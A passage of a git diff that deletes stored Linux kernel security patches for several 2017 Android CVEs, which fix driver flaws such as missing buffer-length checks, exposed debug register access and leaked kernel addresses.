-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- 	__ATTR(writeconfig, S_IWUSR | S_IWGRP,
- 			NULL,
- 			fwu_sysfs_write_config_store),
-@@ -2360,6 +2373,7 @@ static struct device_attribute attrs[] = {
- 	__ATTR(package_id, S_IRUGO,
- 			fwu_sysfs_package_id_show,
- 			synaptics_rmi4_store_error),
-+#endif
- };
- 
- 
-@@ -2470,6 +2484,7 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 	INIT_DELAYED_WORK(&fwu->fwu_work, synaptics_rmi4_fwu_work);
- #endif
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- 	retval = sysfs_create_bin_file(&rmi4_data->i2c_client->dev.kobj,
- 			&dev_attr_data);
- 	if (retval < 0) {
-@@ -2478,6 +2493,7 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 				__func__);
- 		goto exit_free_mem;
- 	}
-+#endif
- 
- 	for (attr_count = 0; attr_count < ARRAY_SIZE(attrs); attr_count++) {
- 		retval = sysfs_create_file(&rmi4_data->i2c_client->dev.kobj,
-@@ -2511,7 +2527,9 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 				&attrs[attr_count].attr);
- 	}
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- 	sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data);
-+#endif
- 
- exit_free_mem:
- 	kfree(fwu->fn_ptr);
-@@ -2528,7 +2546,9 @@ static void synaptics_rmi4_fwu_remove(struct synaptics_rmi4_data *rmi4_data)
- {
- 	unsigned char attr_count;
- 
-+#ifdef CONFIG_TOUCHSCREEN_SYNAPTICS_DSX_FW_UPDATE_EXTRA_SYSFS
- 	sysfs_remove_bin_file(&rmi4_data->input_dev->dev.kobj, &dev_attr_data);
-+#endif
- 
- 	for (attr_count = 0; attr_count < ARRAY_SIZE(attrs); attr_count++) {
- 		sysfs_remove_file(&rmi4_data->input_dev->dev.kobj,
diff --git a/Patches/Linux_CVEs/CVE-2017-0446/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0446/ANY/0001.patch
deleted file mode 100644
index 0a9424c6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0446/ANY/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 773179468893965c2b81aa7ffe3722b6868ef749 Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Fri, 2 Dec 2016 21:56:40 -0800
-Subject: [PATCH] input: touchscreen: disable generic update i/f
-
-Disable the generic touchscreen firmware update hook.
-The generic touchscreen firmware update driver has
-security flaws and is not necessary for Marlin touchscreen
-firmware updates.
-
-synaptics_dsx_htc_2.6 still attempts firmware updates
-via request_firmware on boot with this disabled.
-
-BUG: 32917445
-BUG: 32919560
-BUG: 32769717
-Change-Id: I272a1d1aba16b53647f2dde9dc7ff8b306179b43
-Signed-off-by: Andrew Chant <achant@google.com>
----
- drivers/input/touchscreen/Kconfig | 1 -
- 1 file changed, 1 deletion(-)
-
-diff --git a/drivers/input/touchscreen/Kconfig b/drivers/input/touchscreen/Kconfig
-index b633d17ea8b18..1e7ce91810f41 100644
---- a/drivers/input/touchscreen/Kconfig
-+++ b/drivers/input/touchscreen/Kconfig
-@@ -1020,7 +1020,6 @@ config SECURE_TOUCH
- 
- config TOUCHSCREEN_TOUCH_FW_UPDATE
-         tristate "Touchscreen firmware update"
--        default y
-         help
-           Say Y here to support touch firmware update
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-0447/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0447/ANY/0001.patch
deleted file mode 100644
index 0a9424c6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0447/ANY/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 773179468893965c2b81aa7ffe3722b6868ef749 Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Fri, 2 Dec 2016 21:56:40 -0800
-Subject: [PATCH] input: touchscreen: disable generic update i/f
-
-Disable the generic touchscreen firmware update hook.
-The generic touchscreen firmware update driver has
-security flaws and is not necessary for Marlin touchscreen
-firmware updates.
-
-synaptics_dsx_htc_2.6 still attempts firmware updates
-via request_firmware on boot with this disabled.
-
-BUG: 32917445
-BUG: 32919560
-BUG: 32769717
-Change-Id: I272a1d1aba16b53647f2dde9dc7ff8b306179b43
-Signed-off-by: Andrew Chant <achant@google.com>
----
- drivers/input/touchscreen/Kconfig | 1 -
- 1 file changed, 1 deletion(-)
-
-diff --git a/drivers/input/touchscreen/Kconfig b/drivers/input/touchscreen/Kconfig
-index b633d17ea8b18..1e7ce91810f41 100644
---- a/drivers/input/touchscreen/Kconfig
-+++ b/drivers/input/touchscreen/Kconfig
-@@ -1020,7 +1020,6 @@ config SECURE_TOUCH
- 
- config TOUCHSCREEN_TOUCH_FW_UPDATE
-         tristate "Touchscreen firmware update"
--        default y
-         help
-           Say Y here to support touch firmware update
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-0449/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0449/ANY/0001.patch
deleted file mode 100644
index 7763f01f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0449/ANY/0001.patch
+++ /dev/null
@@ -1,124 +0,0 @@
-From 323a28bf14c622bdd1b9ecf09a339b00af98c965 Mon Sep 17 00:00:00 2001
-From: Insun Song <insun.song@broadcom.com>
-Date: Wed, 23 Nov 2016 08:29:33 -0800
-Subject: [PATCH] net: wireless: bcmdhd: remove PCIe debug IOVAR access
-
-delete PCIe debug IOVARs in production build.
-
-BUG: 31707909
-
-Signed-off-by: Insun Song <insun.song@broadcom.com>
-Change-Id: Icd659169eeae3e587bec1f5587511a354d482a33
----
- drivers/net/wireless/bcmdhd/dhd_pcie.c | 98 ----------------------------------
- 1 file changed, 98 deletions(-)
-
-diff --git a/drivers/net/wireless/bcmdhd/dhd_pcie.c b/drivers/net/wireless/bcmdhd/dhd_pcie.c
-index 26201a6d2f39d..c56f789c4797f 100644
---- a/drivers/net/wireless/bcmdhd/dhd_pcie.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_pcie.c
-@@ -2609,104 +2609,6 @@ dhdpcie_bus_doiovar(dhd_bus_t *bus, const bcm_iovar_t *vi, uint32 actionid, cons
- 		bcmerror = dhdpcie_downloadvars(bus, arg, len);
- 		break;
- 
--	case IOV_SVAL(IOV_PCIEREG):
--		si_corereg(bus->sih, bus->sih->buscoreidx, OFFSETOF(sbpcieregs_t, configaddr), ~0,
--			int_val);
--		si_corereg(bus->sih, bus->sih->buscoreidx, OFFSETOF(sbpcieregs_t, configdata), ~0,
--			int_val2);
--		break;
--
--	case IOV_GVAL(IOV_PCIEREG):
--		si_corereg(bus->sih, bus->sih->buscoreidx, OFFSETOF(sbpcieregs_t, configaddr), ~0,
--			int_val);
--		int_val = si_corereg(bus->sih, bus->sih->buscoreidx,
--			OFFSETOF(sbpcieregs_t, configdata), 0, 0);
--		bcopy(&int_val, arg, sizeof(int_val));
--		break;
--
--	case IOV_GVAL(IOV_BAR0_SECWIN_REG):
--	{
--		uint32 cur_base, base;
--		uchar *bar0;
--		volatile uint32 *offset;
--		/* set the bar0 secondary window to this */
--		/* write the register value */
--		cur_base = dhdpcie_bus_cfg_read_dword(bus, PCIE2_BAR0_CORE2_WIN, sizeof(uint));
--		base = int_val & 0xFFFFF000;
--		dhdpcie_bus_cfg_write_dword(bus, PCIE2_BAR0_CORE2_WIN,  sizeof(uint32), base);
--		bar0 = (uchar *)bus->regs;
--		offset = (uint32 *)(bar0 + 0x4000 + (int_val & 0xFFF));
--		int_val = *offset;
--		bcopy(&int_val, arg, sizeof(int_val));
--		dhdpcie_bus_cfg_write_dword(bus, PCIE2_BAR0_CORE2_WIN, sizeof(uint32), cur_base);
--	}
--		break;
--	case IOV_SVAL(IOV_BAR0_SECWIN_REG):
--	{
--		uint32 cur_base, base;
--		uchar *bar0;
--		volatile uint32 *offset;
--		/* set the bar0 secondary window to this */
--		/* write the register value */
--		cur_base = dhdpcie_bus_cfg_read_dword(bus, PCIE2_BAR0_CORE2_WIN, sizeof(uint));
--		base = int_val & 0xFFFFF000;
--		dhdpcie_bus_cfg_write_dword(bus, PCIE2_BAR0_CORE2_WIN,  sizeof(uint32), base);
--		bar0 = (uchar *)bus->regs;
--		offset = (uint32 *)(bar0 + 0x4000 + (int_val & 0xFFF));
--		*offset = int_val2;
--		bcopy(&int_val2, arg, val_size);
--		dhdpcie_bus_cfg_write_dword(bus, PCIE2_BAR0_CORE2_WIN, sizeof(uint32), cur_base);
--	}
--		break;
--
--	case IOV_SVAL(IOV_PCIECOREREG):
--		si_corereg(bus->sih, bus->sih->buscoreidx, int_val, ~0, int_val2);
--		break;
--	case IOV_GVAL(IOV_SBREG):
--	{
--		sdreg_t sdreg;
--		uint32 addr, coreidx;
--
--		bcopy(params, &sdreg, sizeof(sdreg));
--
--		addr = sdreg.offset;
--		coreidx =  (addr & 0xF000) >> 12;
--
--		int_val = si_corereg(bus->sih, coreidx, (addr & 0xFFF), 0, 0);
--		bcopy(&int_val, arg, sizeof(int32));
--		break;
--	}
--
--	case IOV_SVAL(IOV_SBREG):
--	{
--		sdreg_t sdreg;
--		uint32 addr, coreidx;
--
--		bcopy(params, &sdreg, sizeof(sdreg));
--
--		addr = sdreg.offset;
--		coreidx =  (addr & 0xF000) >> 12;
--
--		si_corereg(bus->sih, coreidx, (addr & 0xFFF), ~0, sdreg.value);
--
--		break;
--	}
--
--
--	case IOV_GVAL(IOV_PCIECOREREG):
--		int_val = si_corereg(bus->sih, bus->sih->buscoreidx, int_val, 0, 0);
--		bcopy(&int_val, arg, sizeof(int_val));
--		break;
--
--	case IOV_SVAL(IOV_PCIECFGREG):
--		OSL_PCI_WRITE_CONFIG(bus->osh, int_val, 4, int_val2);
--		break;
--
--	case IOV_GVAL(IOV_PCIECFGREG):
--		int_val = OSL_PCI_READ_CONFIG(bus->osh, int_val, 4);
--		bcopy(&int_val, arg, sizeof(int_val));
--		break;
--
- 	case IOV_SVAL(IOV_PCIE_LPBK):
- 		bcmerror = dhdpcie_bus_lpback_req(bus, int_val);
- 		break;
diff --git a/Patches/Linux_CVEs/CVE-2017-0451/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0451/ANY/0001.patch
deleted file mode 100644
index 49e142d6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0451/ANY/0001.patch
+++ /dev/null
@@ -1,101 +0,0 @@
-From 59f55cd40b5f44941afc78b78e5bf81ad3dd723e Mon Sep 17 00:00:00 2001
-From: Josh Kirsch <jkirsch@codeaurora.org>
-Date: Mon, 2 May 2016 14:55:04 -0700
-Subject: drivers: soc: Add buffer overflow check for svc send request
-
-Add buffer overflow check in voice_svc_send_req.
-
-CRs-fixed: 1010081
-Change-Id: I4ae703334b0cf04f327b392bc9cd6febd4ad32f2
-Signed-off-by: Josh Kirsch <jkirsch@codeaurora.org>
----
- drivers/soc/qcom/qdsp6v2/voice_svc.c | 46 +++++++++++++++++++++++++-----------
- 1 file changed, 32 insertions(+), 14 deletions(-)
-
-diff --git a/drivers/soc/qcom/qdsp6v2/voice_svc.c b/drivers/soc/qcom/qdsp6v2/voice_svc.c
-index 23b8292..67c58d1 100644
---- a/drivers/soc/qcom/qdsp6v2/voice_svc.c
-+++ b/drivers/soc/qcom/qdsp6v2/voice_svc.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -188,7 +188,8 @@ static int voice_svc_send_req(struct voice_svc_cmd_request *apr_request,
- 	int ret = 0;
- 	void *apr_handle = NULL;
- 	struct apr_data *aprdata = NULL;
--	uint32_t user_payload_size = 0;
-+	uint32_t user_payload_size;
-+	uint32_t payload_size;
- 
- 	pr_debug("%s\n", __func__);
- 
-@@ -200,15 +201,19 @@ static int voice_svc_send_req(struct voice_svc_cmd_request *apr_request,
- 	}
- 
- 	user_payload_size = apr_request->payload_size;
-+	payload_size = sizeof(struct apr_data) + user_payload_size;
- 
--	aprdata = kmalloc(sizeof(struct apr_data) + user_payload_size,
--			  GFP_KERNEL);
--
--	if (aprdata == NULL) {
--		pr_err("%s: aprdata kmalloc failed.\n", __func__);
--
--		ret = -ENOMEM;
-+	if (payload_size <= user_payload_size) {
-+		pr_err("%s: invalid payload size ( 0x%x ).\n",
-+			__func__, user_payload_size);
-+		ret = -EINVAL;
- 		goto done;
-+	} else {
-+		aprdata = kmalloc(payload_size, GFP_KERNEL);
-+		if (aprdata == NULL) {
-+			ret = -ENOMEM;
-+			goto done;
-+		}
- 	}
- 
- 	voice_svc_update_hdr(apr_request, aprdata);
-@@ -388,18 +393,31 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf,
- 
- 	switch (cmd) {
- 	case MSG_REGISTER:
--		ret = process_reg_cmd(
-+		if (count  >=
-+				(sizeof(struct voice_svc_register) +
-+				sizeof(*data))) {
-+			ret = process_reg_cmd(
- 			(struct voice_svc_register *)data->payload, prtd);
--		if (!ret)
--			ret = count;
--
-+			if (!ret)
-+				ret = count;
-+		} else {
-+			pr_err("%s: invalid payload size\n", __func__);
-+			ret = -EINVAL;
-+			goto done;
-+		}
- 		break;
- 	case MSG_REQUEST:
-+	if (count >= (sizeof(struct voice_svc_cmd_request) +
-+					sizeof(*data))) {
- 		ret = voice_svc_send_req(
- 			(struct voice_svc_cmd_request *)data->payload, prtd);
- 		if (!ret)
- 			ret = count;
--
-+	} else {
-+		pr_err("%s: invalid payload size\n", __func__);
-+		ret = -EINVAL;
-+		goto done;
-+	}
- 		break;
- 	default:
- 		pr_debug("%s: Invalid command: %u\n", __func__, cmd);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0451/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-0451/ANY/0002.patch
deleted file mode 100644
index f16c4d87..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0451/ANY/0002.patch
+++ /dev/null
@@ -1,106 +0,0 @@
-From 35346beb2d8882115f698ab22a96803552b5c57e Mon Sep 17 00:00:00 2001
-From: Siena Richard <sienar@codeaurora.org>
-Date: Tue, 4 Oct 2016 12:24:28 -0700
-Subject: drivers: soc: add size checks and update log messages
-
-Add size checks to validate minimum size is met. Update log messages
-to include only relevant information to ensure logs are accurate and
-useful.
-
-Change-Id: Idf76a7d964ec6989a0474d49895e54103f17938b
-CRs-fixed: 1073129
-Signed-off-by: Siena Richard <sienar@codeaurora.org>
----
- drivers/soc/qcom/qdsp6v2/voice_svc.c | 41 ++++++++++++++++++++++++++----------
- 1 file changed, 30 insertions(+), 11 deletions(-)
-
-diff --git a/drivers/soc/qcom/qdsp6v2/voice_svc.c b/drivers/soc/qcom/qdsp6v2/voice_svc.c
-index 67c58d1..50dd925 100644
---- a/drivers/soc/qcom/qdsp6v2/voice_svc.c
-+++ b/drivers/soc/qcom/qdsp6v2/voice_svc.c
-@@ -223,8 +223,8 @@ static int voice_svc_send_req(struct voice_svc_cmd_request *apr_request,
- 	} else if (!strcmp(apr_request->svc_name, VOICE_SVC_MVM_STR)) {
- 		apr_handle = prtd->apr_q6_mvm;
- 	} else {
--		pr_err("%s: Invalid service %s\n", __func__,
--			apr_request->svc_name);
-+		pr_err("%s: Invalid service %.*s\n", __func__,
-+			MAX_APR_SERVICE_NAME_LEN, apr_request->svc_name);
- 
- 		ret = -EINVAL;
- 		goto done;
-@@ -338,8 +338,8 @@ static int process_reg_cmd(struct voice_svc_register *apr_reg_svc,
- 		svc = VOICE_SVC_CVS_STR;
- 		handle = &prtd->apr_q6_cvs;
- 	} else {
--		pr_err("%s: Invalid Service: %s\n", __func__,
--		       apr_reg_svc->svc_name);
-+		pr_err("%s: Invalid Service: %.*s\n", __func__,
-+			MAX_APR_SERVICE_NAME_LEN, apr_reg_svc->svc_name);
- 		ret = -EINVAL;
- 		goto done;
- 	}
-@@ -365,7 +365,17 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf,
- 
- 	pr_debug("%s\n", __func__);
- 
--	data = kmalloc(count, GFP_KERNEL);
-+	/*
-+	 * Check if enough memory is allocated to parse the message type.
-+	 * Will check there is enough to hold the payload later.
-+	 */
-+	if (count >= sizeof(struct voice_svc_write_msg)) {
-+		data = kmalloc(count, GFP_KERNEL);
-+	} else {
-+		pr_debug("%s: invalid data size\n", __func__);
-+		ret = -EINVAL;
-+		goto done;
-+	}
- 
- 	if (data == NULL) {
- 		pr_err("%s: data kmalloc failed.\n", __func__);
-@@ -383,7 +393,7 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf,
- 	}
- 
- 	cmd = data->msg_type;
--	prtd = (struct voice_svc_prvt *)file->private_data;
-+	prtd = (struct voice_svc_prvt *) file->private_data;
- 	if (prtd == NULL) {
- 		pr_err("%s: prtd is NULL\n", __func__);
- 
-@@ -393,9 +403,13 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf,
- 
- 	switch (cmd) {
- 	case MSG_REGISTER:
--		if (count  >=
--				(sizeof(struct voice_svc_register) +
--				sizeof(*data))) {
-+		/*
-+		 * Check that count reflects the expected size to ensure
-+		 * sufficient memory was allocated. Since voice_svc_register
-+		 * has a static size, this should be exact.
-+		 */
-+		if (count == (sizeof(struct voice_svc_write_msg) +
-+			      sizeof(struct voice_svc_register))) {
- 			ret = process_reg_cmd(
- 			(struct voice_svc_register *)data->payload, prtd);
- 			if (!ret)
-@@ -407,8 +421,13 @@ static ssize_t voice_svc_write(struct file *file, const char __user *buf,
- 		}
- 		break;
- 	case MSG_REQUEST:
--	if (count >= (sizeof(struct voice_svc_cmd_request) +
--					sizeof(*data))) {
-+		/*
-+		 * Check that count reflects the expected size to ensure
-+		 * sufficient memory was allocated. Since voice_svc_cmd_request
-+		 * has a variable size, check the minimum value count must be.
-+		 */
-+		if (count >= (sizeof(struct voice_svc_write_msg) +
-+			      sizeof(struct voice_svc_cmd_request))) {
- 		ret = voice_svc_send_req(
- 			(struct voice_svc_cmd_request *)data->payload, prtd);
- 		if (!ret)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0452/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0452/ANY/0001.patch
deleted file mode 100644
index 8ad73f60..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0452/ANY/0001.patch
+++ /dev/null
@@ -1,55 +0,0 @@
-From 4fa7499742c56c7f7064c9dc14c3a34f4be38851 Mon Sep 17 00:00:00 2001
-From: Ariel Yin <ayin@google.com>
-Date: Fri, 13 Jan 2017 13:58:56 -0800
-Subject: [PATCH] msm: vidc: WARN_ON() reveals fuction addresses
-
-There is a security vulnerability where function addresses are
-printed in kernel message if WARN_ON() is invoked implicitly.
-WARN_ON() call is made explicit to avoid this issue.
-
-Bug: 32873615
-CRs-Fixed: 1093693
-Change-Id: If75581803adf62cb9bda3784ad1d4f4088e0d797
-Signed-off-by: Sanjay Singh <sisanj@codeaurora.org>
-Signed-off-by: Biswajit Paul <biswajitpaul@codeaurora.org>
----
- drivers/media/platform/msm/vidc/msm_vidc.c  | 3 ++-
- drivers/media/platform/msm/vidc/venus_hfi.c | 4 ++--
- 2 files changed, 4 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/media/platform/msm/vidc/msm_vidc.c b/drivers/media/platform/msm/vidc/msm_vidc.c
-index 0f55f3254a43b..b90ebc11d527a 100644
---- a/drivers/media/platform/msm/vidc/msm_vidc.c
-+++ b/drivers/media/platform/msm/vidc/msm_vidc.c
-@@ -1405,7 +1405,8 @@ static void cleanup_instance(struct msm_vidc_inst *inst)
- 		debugfs_remove_recursive(inst->debugfs_root);
- 
- 		mutex_lock(&inst->pending_getpropq.lock);
--		WARN_ON(!list_empty(&inst->pending_getpropq.list));
-+		WARN_ON(!list_empty(&inst->pending_getpropq.list)
-+			&& (msm_vidc_debug & VIDC_INFO));
- 		mutex_unlock(&inst->pending_getpropq.lock);
- 	}
- }
-diff --git a/drivers/media/platform/msm/vidc/venus_hfi.c b/drivers/media/platform/msm/vidc/venus_hfi.c
-index a7a391f9c8d30..6f6d79a1f6946 100644
---- a/drivers/media/platform/msm/vidc/venus_hfi.c
-+++ b/drivers/media/platform/msm/vidc/venus_hfi.c
-@@ -261,7 +261,7 @@ static int venus_hfi_acquire_regulator(struct regulator_info *rinfo)
- 					rinfo->name);
- 		}
- 	}
--	WARN_ON(!regulator_is_enabled(rinfo->regulator));
-+	WARN_ON(!regulator_is_enabled(rinfo->regulator) && (msm_vidc_debug & VIDC_INFO));
- 	return rc;
- }
- 
-@@ -3954,7 +3954,7 @@ static int venus_hfi_disable_regulator(struct regulator_info *rinfo)
- disable_regulator_failed:
- 
- 	/* Bring attention to this issue */
--	WARN_ON(1);
-+	WARN_ON(msm_vidc_debug & VIDC_INFO);
- 	return rc;
- }
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-0453/prima/0003.patch b/Patches/Linux_CVEs/CVE-2017-0453/prima/0003.patch
deleted file mode 100644
index 7aef755b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0453/prima/0003.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From ddf864f37134df0960d337ff16e6f2435b4fe90c Mon Sep 17 00:00:00 2001
-From: Manjeet Singh <manjee@codeaurora.org>
-Date: Fri, 10 Feb 2017 19:03:38 +0530
-Subject: wlan: Add buf len check in wlan_hdd_cfg80211_testmode
-
-In __wlan_hdd_cfg80211_testmode API no checks are in place that
-ensure that buflen is smaller or equal the size of the stack
-variable hb_params. Hence, the vos_mem_copy() call can overflow
-stack memory.
-
-Add buf len check to avoid stack overflow.
-
-CRs-Fixed: 1105085
-Change-Id: I6af6a74cc38ebce3337120adcf7e9595f22d3d8c
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 81c3944..0c0bca2 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -16424,6 +16424,12 @@ static int __wlan_hdd_cfg80211_testmode(struct wiphy *wiphy, void *data, int len
-             buf = nla_data(tb[WLAN_HDD_TM_ATTR_DATA]);
-             buf_len = nla_len(tb[WLAN_HDD_TM_ATTR_DATA]);
- 
-+            if (buf_len > sizeof(*hb_params)) {
-+                hddLog(LOGE, FL("buf_len=%d exceeded hb_params size limit"),
-+                       buf_len);
-+                return -ERANGE;
-+            }
-+
-             hb_params_temp =(tSirLPHBReq *)buf;
-             if ((hb_params_temp->cmd == LPHB_SET_TCP_PARAMS_INDID) &&
-                 (hb_params_temp->params.lphbTcpParamReq.timePeriodSec == 0))
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0453/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0453/qcacld-2.0/0001.patch
deleted file mode 100644
index e41b97d8..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0453/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 29c4ddb447b2d49409a9d0b93631f84a9d2e922e Mon Sep 17 00:00:00 2001
-From: Manjeet Singh <manjee@codeaurora.org>
-Date: Tue, 27 Dec 2016 17:48:37 +0530
-Subject: qcacld-2.0: Add buf len check in wlan_hdd_cfg80211_testmode
-
-In __wlan_hdd_cfg80211_testmode API no checks are in place that
-ensure that buflen is smaller or equal the size of the stack
-variable hb_params. Hence, the vos_mem_copy() call can overflow
-stack memory.
-
-Add buf len check to avoid stack overflow
-
-CRs-Fixed: 1105085
-Change-Id: I6af6a74cc38ebce3337120adcf7e9595f22d3d8c
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 1ad4ef2..54605a2 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -26336,6 +26336,12 @@ static int __wlan_hdd_cfg80211_testmode(struct wiphy *wiphy,
-                 (hb_params_temp->params.lphbTcpParamReq.timePeriodSec == 0))
-                 return -EINVAL;
- 
-+            if (buf_len > sizeof(*hb_params)) {
-+                hddLog(LOGE, FL("buf_len=%d exceeded hb_params size limit"),
-+                       buf_len);
-+                return -ERANGE;
-+            }
-+
-             hb_params = (tSirLPHBReq *)vos_mem_malloc(sizeof(tSirLPHBReq));
-             if (NULL == hb_params) {
-                 hddLog(LOGE, FL("Request Buffer Alloc Fail"));
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0453/qcacld-3.0/0002.patch b/Patches/Linux_CVEs/CVE-2017-0453/qcacld-3.0/0002.patch
deleted file mode 100644
index 3f8a3310..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0453/qcacld-3.0/0002.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From a2959858f428acfca3ca4c61d3c10b446bfe9b60 Mon Sep 17 00:00:00 2001
-From: Manjeet Singh <manjee@codeaurora.org>
-Date: Tue, 3 Jan 2017 12:08:10 +0530
-Subject: qcacld-3.0: Add buf len check in wlan_hdd_cfg80211_testmode
-
-qcacld-2.0 to qcacld-3.0 propagation.
-
-In __wlan_hdd_cfg80211_testmode API no checks are in place that
-ensure that buflen is smaller or equal the size of the stack
-variable hb_params. Hence, the vos_mem_copy() call can overflow
-stack memory.
-
-Add buf len check to avoid stack overflow
-
-CRs-Fixed: 1105085
-Change-Id: I6af6a74cc38ebce3337120adcf7e9595f22d3d8c
----
- core/hdd/src/wlan_hdd_cfg80211.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/core/hdd/src/wlan_hdd_cfg80211.c b/core/hdd/src/wlan_hdd_cfg80211.c
-index 98b0012..1f34e4c 100644
---- a/core/hdd/src/wlan_hdd_cfg80211.c
-+++ b/core/hdd/src/wlan_hdd_cfg80211.c
-@@ -14974,6 +14974,12 @@ static int __wlan_hdd_cfg80211_testmode(struct wiphy *wiphy,
- 			timePeriodSec == 0))
- 			return -EINVAL;
- 
-+		if (buf_len > sizeof(*hb_params)) {
-+			hdd_err("buf_len=%d exceeded hb_params size limit",
-+				buf_len);
-+			return -ERANGE;
-+		}
-+
- 		hb_params =
- 			(tSirLPHBReq *) qdf_mem_malloc(sizeof(tSirLPHBReq));
- 		if (NULL == hb_params) {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0454/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0454/3.10/0001.patch
deleted file mode 100644
index 48e7fed3..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0454/3.10/0001.patch
+++ /dev/null
@@ -1,119 +0,0 @@
-From 01f3ad23574c85a060e6add7a20173621b5b2c77 Mon Sep 17 00:00:00 2001
-From: kunleiz <kunleiz@codeaurora.org>
-Date: Thu, 22 Dec 2016 18:03:37 +0800
-Subject: ASoC: msm: qdspv2: add mutex lock when access output buffer length
-
-Add mutex protection to avoid access output_len in parallel.
-
-CRs-Fixed: 1104067
-Change-Id: I4e17258e2abee9cd68152f4b79520b00003aa80d
-Signed-off-by: kunleiz <kunleiz@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c | 16 +++++++++++++++-
- 1 file changed, 15 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-index d4fddf3..7a8e6f8 100644
---- a/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-+++ b/drivers/misc/qcom/qdsp6v2/audio_hwacc_effects.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2014, 2016, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014, 2016-2017, The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -29,6 +29,8 @@ struct q6audio_effects {
- 	struct audio_client             *ac;
- 	struct msm_hwacc_effects_config  config;
- 
-+	struct mutex			lock;
-+
- 	atomic_t			in_count;
- 	atomic_t			out_count;
- 
-@@ -231,8 +233,11 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 		uint32_t idx = 0;
- 		uint32_t size = 0;
- 
-+		mutex_lock(&effects->lock);
-+
- 		if (!effects->started) {
- 			rc = -EFAULT;
-+			mutex_unlock(&effects->lock);
- 			goto ioctl_fail;
- 		}
- 
-@@ -242,11 +247,13 @@ static int audio_effects_shared_ioctl(struct file *file, unsigned cmd,
- 		if (!rc) {
- 			pr_err("%s: write wait_event_timeout\n", __func__);
- 			rc = -EFAULT;
-+			 mutex_unlock(&effects->lock);
- 			goto ioctl_fail;
- 		}
- 		if (!atomic_read(&effects->out_count)) {
- 			pr_err("%s: pcm stopped out_count 0\n", __func__);
- 			rc = -EFAULT;
-+			mutex_unlock(&effects->lock);
- 			goto ioctl_fail;
- 		}
- 
